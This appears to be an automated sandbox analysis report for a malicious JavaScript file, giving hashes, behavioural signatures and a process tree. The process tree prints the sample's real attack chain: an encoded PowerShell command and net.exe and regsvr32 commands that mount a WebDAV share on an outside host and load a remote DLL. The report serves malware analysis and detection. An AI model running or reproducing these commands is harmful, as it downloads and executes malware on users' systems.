Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
20/08/2024, 14:24
Static task
static1
Behavioral task
behavioral1
Sample
0d7d6ce2afc5fde8e35197667805a1c8b46feb62793ae008319abadcd75b3dd4.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
0d7d6ce2afc5fde8e35197667805a1c8b46feb62793ae008319abadcd75b3dd4.js
Resource
win10v2004-20240802-en
General
-
Target
0d7d6ce2afc5fde8e35197667805a1c8b46feb62793ae008319abadcd75b3dd4.js
-
Size
8KB
-
MD5
f4e7eb825ae54cf12d25350d99837c42
-
SHA1
5d4bf885646cf64ed5fd318c8623ea601f3f7bbd
-
SHA256
0d7d6ce2afc5fde8e35197667805a1c8b46feb62793ae008319abadcd75b3dd4
-
SHA512
a203712ba316b0456b83597132427818a07ca5bf007a0d23b84acf6fe8e0f903d1ee242dcd1eba7eec8b6cc9f7343c3fd9f560bf7a9557b513569942bc6a44e9
-
SSDEEP
192:6tOJNkoWcm6H87EiAZt6fgpuJNpPqUuRoXrjCyIzHyI6VBQMkCURFNybthgAmtqZ:6tD7EiAZt6fUuJ3PqUuRoXrjCyIzHyII
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1992 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1992 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1500 wrote to memory of 1992 1500 wscript.exe 30 PID 1500 wrote to memory of 1992 1500 wscript.exe 30 PID 1500 wrote to memory of 1992 1500 wscript.exe 30 PID 1992 wrote to memory of 2116 1992 powershell.exe 32 PID 1992 wrote to memory of 2116 1992 powershell.exe 32 PID 1992 wrote to memory of 2116 1992 powershell.exe 32 PID 1992 wrote to memory of 2136 1992 powershell.exe 33 PID 1992 wrote to memory of 2136 1992 powershell.exe 33 PID 1992 wrote to memory of 2136 1992 powershell.exe 33 PID 1992 wrote to memory of 2136 1992 powershell.exe 33 PID 1992 wrote to memory of 2136 1992 powershell.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\0d7d6ce2afc5fde8e35197667805a1c8b46feb62793ae008319abadcd75b3dd4.js1⤵
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcACAAOwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADEANgA4ADkAMwA3ADAANgAxADIANwA2ADcAMAAuAGQAbABsAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\dailywebstats.com@8888\davwwwroot\3⤵PID:2116
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\dailywebstats.com@8888\davwwwroot\16893706127670.dll3⤵PID:2136
-
-